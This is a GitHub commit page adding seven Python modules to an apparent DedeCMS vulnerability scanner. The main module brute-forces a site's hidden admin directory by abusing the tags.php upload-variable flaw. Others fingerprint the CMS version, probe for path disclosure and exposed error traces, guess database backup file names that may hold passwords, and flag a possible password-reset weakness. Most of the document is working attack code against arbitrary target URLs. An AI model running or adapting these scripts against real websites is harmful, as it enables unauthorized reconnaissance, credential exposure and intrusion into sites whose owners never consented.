forked from lengjibo/dedecmscan
-
Notifications
You must be signed in to change notification settings - Fork 11
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
Showing
7 changed files
with
258 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,63 @@ | ||
import requests | ||
import itertools | ||
from termcolor import cprint | ||
|
||
class FindAdmin: | ||
|
||
def __init__(self,url): | ||
self.url = url | ||
|
||
def findadmin(self): | ||
try: | ||
characters = "abcdefghijklmnopqrstuvwxyz0123456789_!#" | ||
back_dir = "" | ||
flag = 0 | ||
if ':https://' not in self.url: | ||
self.url = 'http:https://' + self.url + '/' | ||
url = self.url | ||
vulnurl = url + "/tags.php" | ||
payload = '/dede' | ||
r = requests.get(url=url+payload) | ||
if r.status_code == 200: | ||
back_dir = url + payload | ||
else: | ||
data = { | ||
"_FILES[mochazz][tmp_name]": "./{p}<</images/adminico.gif", | ||
"_FILES[mochazz][name]": 0, | ||
"_FILES[mochazz][size]": 0, | ||
"_FILES[mochazz][type]": "image/gif" | ||
} | ||
for num in range(1, 7): | ||
if flag: | ||
break | ||
for pre in itertools.permutations(characters, num): | ||
pre = ''.join(list(pre)) | ||
data["_FILES[mochazz][tmp_name]"] = data["_FILES[mochazz][tmp_name]"].format(p=pre) | ||
r = requests.post(vulnurl, data=data) | ||
if "Upload filetype not allow !" not in r.text and r.status_code == 200: | ||
flag = 1 | ||
back_dir = pre | ||
data["_FILES[mochazz][tmp_name]"] = "./{p}<</images/adminico.gif" | ||
break | ||
else: | ||
data["_FILES[mochazz][tmp_name]"] = "./{p}<</images/adminico.gif" | ||
flag = 0 | ||
for i in range(30): | ||
if flag: | ||
break | ||
for ch in characters: | ||
if ch == characters[-1]: | ||
flag = 1 | ||
break | ||
data["_FILES[mochazz][tmp_name]"] = data["_FILES[mochazz][tmp_name]"].format(p=back_dir + ch) | ||
r = requests.post(url, data=data) | ||
if "Upload filetype not allow !" not in r.text and r.status_code == 200: | ||
back_dir += ch | ||
data["_FILES[mochazz][tmp_name]"] = "./{p}<</images/adminico.gif" | ||
break | ||
else: | ||
data["_FILES[mochazz][tmp_name]"] = "./{p}<</images/adminico.gif" | ||
|
||
cprint("find dedeadmin is :" + back_dir,"red") | ||
except: | ||
return False |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,72 @@ | ||
import requests | ||
from termcolor import cprint | ||
import re | ||
|
||
|
||
class GetVersion: | ||
|
||
def __init__(self,url): | ||
self.url = url | ||
|
||
|
||
|
||
def version(self): | ||
|
||
def cheakver(arg): | ||
ver_histroy = {'20080307': 'v3 or v4 or v5', | ||
'20080324': 'v5 above', | ||
'20080807': '5.1 or 5.2', | ||
'20081009': 'v5.1sp', | ||
'20081218': '5.1sp', | ||
'20090810': '5.5', | ||
'20090912': '5.5', | ||
'20100803': '5.6', | ||
'20101021': '5.3', | ||
'20111111': 'v5.7 or v5.6 or v5.5', | ||
'20111205': '5.7.18', | ||
'20111209': '5.6', | ||
'20120430': '5.7SP or 5.7 or 5.6', | ||
'20120621': '5.7SP1 or 5.7 or 5.6', | ||
'20120709': '5.6', | ||
'20121030': '5.7SP1 or 5.7', | ||
'20121107': '5.7', | ||
'20130608': 'V5.6-Final', | ||
'20130922': 'V5.7SP1', | ||
'20140225': 'V5.6SP1', | ||
'20140725': 'V5.7SP1', | ||
'20150618': '5.7', | ||
'20180109': 'V5.7SP2' | ||
} | ||
ver_list = sorted(list(ver_histroy.keys()))#将键变成列表,并排序 | ||
ver_list.append(arg)#将参数加到末尾 | ||
sorted_ver_list = sorted(ver_list)#重新排序 | ||
return ver_histroy[ver_list[sorted_ver_list.index(arg) ]]#判断是否在其中,并返回其值 | ||
|
||
headers = { | ||
"User-Agent": "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)", | ||
"Content-Type":"application/x-www-form-urlencoded", | ||
"Accept-Encoding": "gzip, deflate" | ||
} | ||
payload = "/data/admin/ver.txt" | ||
if ':https://' not in self.url: | ||
self.url = 'http:https://' + self.url + '/' | ||
url = self.url | ||
vulnurl = url + payload | ||
try: | ||
r = requests.get(url=vulnurl,headers=headers) | ||
if r.status_code == 200: | ||
m = re.search("^(\d+)$", r.text) | ||
if m: | ||
version = cheakver(m.group(1)) | ||
msg = "探测到dedecms版本:{} version:{}".format(r.text, version) | ||
cprint(msg, "red") | ||
except: | ||
return False | ||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1 @@ | ||
# -*- coding: utf-8 -*- |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,31 @@ | ||
import requests | ||
from termcolor import cprint | ||
|
||
class passwordres: | ||
|
||
def __init__(self,url): | ||
|
||
self.url = url | ||
|
||
def checkpass(self): | ||
headers = { | ||
"User-Agent": "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)", | ||
"Content-Type": "application/x-www-form-urlencoded", | ||
"Accept-Encoding": "gzip, deflate" | ||
} | ||
payload = 'member/reg_new.php' | ||
|
||
if ':https://' not in self.url: | ||
self.url = 'http:https://' + self.url + '/' | ||
url = self.url | ||
vulnurl = url + payload | ||
|
||
try: | ||
r = requests.get(url=vulnurl,headers=headers) | ||
|
||
if "系统关闭了会员功能" in r.text: | ||
return | ||
else: | ||
cprint("可能存在dede任意用户重置漏洞:https://www.t00ls.net/thread-43689-1-1.html","red") | ||
except: | ||
return False |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,37 @@ | ||
import requests | ||
from termcolor import cprint | ||
import re | ||
|
||
class path: | ||
|
||
def __init__(self,url): | ||
|
||
self.url = url | ||
|
||
def checkpath(self): | ||
headers = { | ||
"User-Agent": "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50" | ||
} | ||
if ':https://' not in self.url: | ||
self.url = 'http:https://' + self.url + '/' | ||
url = self.url | ||
payloads = [ | ||
'member/inc/config_pay_yeepay.php', | ||
'member/inc/config_pay_tenpay.php', | ||
'member/inc/config_pay_nps.php ', | ||
'member/inc/config_pay_cbpayment.php ', | ||
'member/inc/config_pay_alipay.php', | ||
'include/downmix.inc.php' | ||
] | ||
try: | ||
|
||
for payload in payloads: | ||
vulnurl = url + payload | ||
r = requests.get(url=vulnurl,headers=headers) | ||
if r.status_code == 200: | ||
m = re.search('in <b>([^<]+)</b>', r.text) | ||
if m: | ||
cprint("dedecmd path:" + vulnurl,"red") | ||
|
||
except: | ||
return False |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,29 @@ | ||
import requests | ||
from termcolor import cprint | ||
|
||
|
||
class shortpath: | ||
|
||
def __init__(self,url): | ||
self.url = url | ||
|
||
def shortpath(self): | ||
headers = { | ||
"User-Agent": "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50" | ||
} | ||
payloads = ['/data/backupdata/dede_h~', '/data/backupdata/dede_m~', '/data/backupdata/dede_p~', | ||
'/data/backupdata/dede_a~', '/data/backupdata/dede_s~'] | ||
if ':https://' not in self.url: | ||
self.url = 'http:https://' + self.url + '/' | ||
url = self.url | ||
try: | ||
for payload in payloads: | ||
for number in range(1, 5): | ||
testurl = url.strip() + payload + str(number) + ".txt" | ||
r = requests.get(url=testurl,headers=headers) | ||
html = r.text | ||
if r.status_code == 200 and ("admin" in html or "密码" in html): | ||
cprint("dede databak is vulnable" + testurl,"red") | ||
except: | ||
return False | ||
|
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,25 @@ | ||
import requests | ||
from termcolor import cprint | ||
|
||
|
||
class trace: | ||
|
||
def __init__(self,url): | ||
self.url = url | ||
|
||
def checktrace(self): | ||
headers = { | ||
"User-Agent": "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50" | ||
} | ||
payload = "/data/mysql_error_trace.inc" | ||
if ':https://' not in self.url: | ||
self.url = 'http:https://' + self.url + '/' | ||
url = self.url | ||
vulnurl = url + payload | ||
|
||
try: | ||
r = requests.get(url=vulnurl,headers=headers) | ||
if r.status_code == 200 and r"<?php" in r.text(): | ||
cprint("mysql trace is vulnable:" + vulnurl,"red") | ||
except: | ||
return False |